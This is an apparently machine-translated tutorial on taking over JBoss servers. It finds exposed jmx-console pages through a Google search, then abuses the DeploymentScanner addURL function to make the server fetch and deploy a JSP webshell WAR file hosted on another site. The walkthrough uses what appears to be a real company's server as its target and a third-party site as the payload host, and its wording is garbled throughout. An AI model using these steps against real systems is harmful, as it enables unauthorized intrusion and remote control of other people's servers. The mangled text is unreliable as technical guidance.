JBoss is a large application platform, ordinary users is difficult to come into contact with. The more difficult to contact something the more I advanced, to borrow a Beijing bus driver Lee su Li of the word“force can only dry out the incompetent, hard to dry out outstanding”, in security is also true, although the JBoss platform difficult to master, but as long as the Find Jboss's Achilles heel, the same as the easy penetration, this article on how to for Jboss a loophole to get their Webshell, because it is Research, so the only point to so far.
First, the information collection and finishing 1. Use the vulnerability feature of the search
In Jboss the entire exploit in a notable feature is the“8 0 8 0/jmx-console/”, of course, the entire there are also other features, with this feature mainly to facilitate in the Google search now using google search address: www.google.com.hk using Baidu search results than Google. In the Google input box, enter: inurl:”8 0 8 0/jmx-console/”, will come out a bunch of results.
2. Access to the site and perform vulnerability test
To search out the records one by one to view, see whether the normal access. Due to the search engine's timeliness, some sites while the results in the search results, but due to various reasons the site has been unable to access. If the site can not normally access is discarded. From the results we found http://oa. tsingtaobeer-sales. com:8 0 8 0/jmx-console/web site can be a normal visit, and then in the page search for“jboss. deployment”, and found* flavor=URL,type=DeploymentScanner, click the link to see whether the normal access, as shown in Figure 1.
Figure 1 test Jboss page
3. Add Webshell. war file address
The Jsp shell is compressed into a war file, and then the war uploaded to the Internet can access the website on, for example, in this case the war of the real address“http://www.cam*. com. hk/forum/forumdata/cache/war. war”is. The current open page address“http://oa.tsingtaobeer-sales.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=a jboss. deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL”, in the page to look for“void addURL()”function, find the“http://www.cam. com. hk/forum/forumdata/cache/cmd. war”copy“ParamValue”, as shown in Figure 2, and then click“invoke”http://www. cam**. com. hk/forum/forumdata/cache/war. war download to a local server for deployment. After successful deployment will be given the appropriate prompt, as shown in Figure 3.
Figure 2 Using the addURL function to download and deploy the war file
Figure 3 The operation is executed successfully